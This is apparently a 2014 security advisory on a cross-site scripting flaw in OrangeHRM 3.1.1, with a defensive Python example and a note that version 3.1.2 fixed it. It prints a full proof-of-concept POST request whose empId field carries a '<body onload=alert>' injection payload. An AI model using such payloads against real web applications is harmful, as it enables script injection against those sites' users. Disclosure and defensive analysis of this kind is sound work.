# ==============================================================
# Title ...| XSS vulnerability in OrangeHRM
# Version .| OrangeHRM 3.1.1
# Date ....| 28.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.orangehrm.com
# ==============================================================
[+] from admin user:
# ==============================================================
# XSS
---<request>---
POST /k/cms/orange/orangehrm-3.1.1/symfony/web/index.php/pim/viewEmployeeList HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 418

empsearch%5Bemployee_name%5D%5BempName%5D=asdasd&empsearch%5Bemployee_name%5D%5BempId%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&empsearch%5Bid%5D=&empsearch%5Bemployee_status%5D=0&empsearch%5Btermination%5D=1&empsearch%5Bsupervisor_name%5D=asdasd&empsearch%5Bjob_title%5D=0&empsearch%5Bsub_unit%5D=0&empsearch%5BisSubmitted%5D=yes&empsearch%5B_csrf_token%5D=109e14ec2ad65dc3a8eaa4bf8c28582a&pageNo=&hdnAction=search
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
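
Added example (not part of the original advisory and not OrangeHRM code): it percent-decodes a shortened copy of the request body above, flags the field that carries HTML metacharacters, and shows HTML attribute encoding neutralizing the empId value. The render_input helper and the idea that the value is echoed into a quoted input attribute are assumptions; the page does not show the response.

```python
import html
from urllib.parse import parse_qsl

# Body from the request above, shortened to four fields; the empId value is
# the one shown on the page.
BODY = (
    "empsearch%5Bemployee_name%5D%5BempName%5D=asdasd"
    "&empsearch%5Bemployee_name%5D%5BempId%5D='%3e\"%3e%3cbody%2fonload%3dalert(9999)%3e"
    "&empsearch%5Bid%5D=&hdnAction=search"
)

HTML_META = set("<>\"'")


def decode_fields(body):
    """Return the form fields as (name, value) pairs, percent-decoded."""
    return parse_qsl(body, keep_blank_values=True)


def suspicious_fields(body):
    """Names of fields whose decoded value contains HTML metacharacters."""
    return [name for name, value in decode_fields(body) if HTML_META & set(value)]


def render_input(name, value, encode=True):
    """Build the <input> a search form might echo back (hypothetical sink).

    encode=False mimics an unencoded reflection; encode=True applies
    HTML attribute encoding, both quote characters included.
    """
    shown = html.escape(value, quote=True) if encode else value
    safe_name = html.escape(name, quote=True)
    return '<input type="text" name="%s" value="%s">' % (safe_name, shown)


if __name__ == "__main__":
    fields = dict(decode_fields(BODY))
    target = "empsearch[employee_name][empId]"
    print("flagged:", suspicious_fields(BODY))
    print("decoded:", fields[target])
    print("raw    :", render_input(target, fields[target], encode=False))
    print("encoded:", render_input(target, fields[target], encode=True))
```
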
This reported issue is fixed by OrangeHRM, and the latest OrangeHRM open source version is released.

OrangeHRM 3.1.2 has been released to SourceForge with security related fixes.
Released on (May 20, 2014)
Download URL of zip archive : http://sourceforge.net/projects/orangehrm/files/stable/3.1.2/orangehrm-3.1.2.zip/download
Kavitha: big thanks for the update ;)

iyomi: thank you too ;)
If you have any questions, feel free to contact me.
o/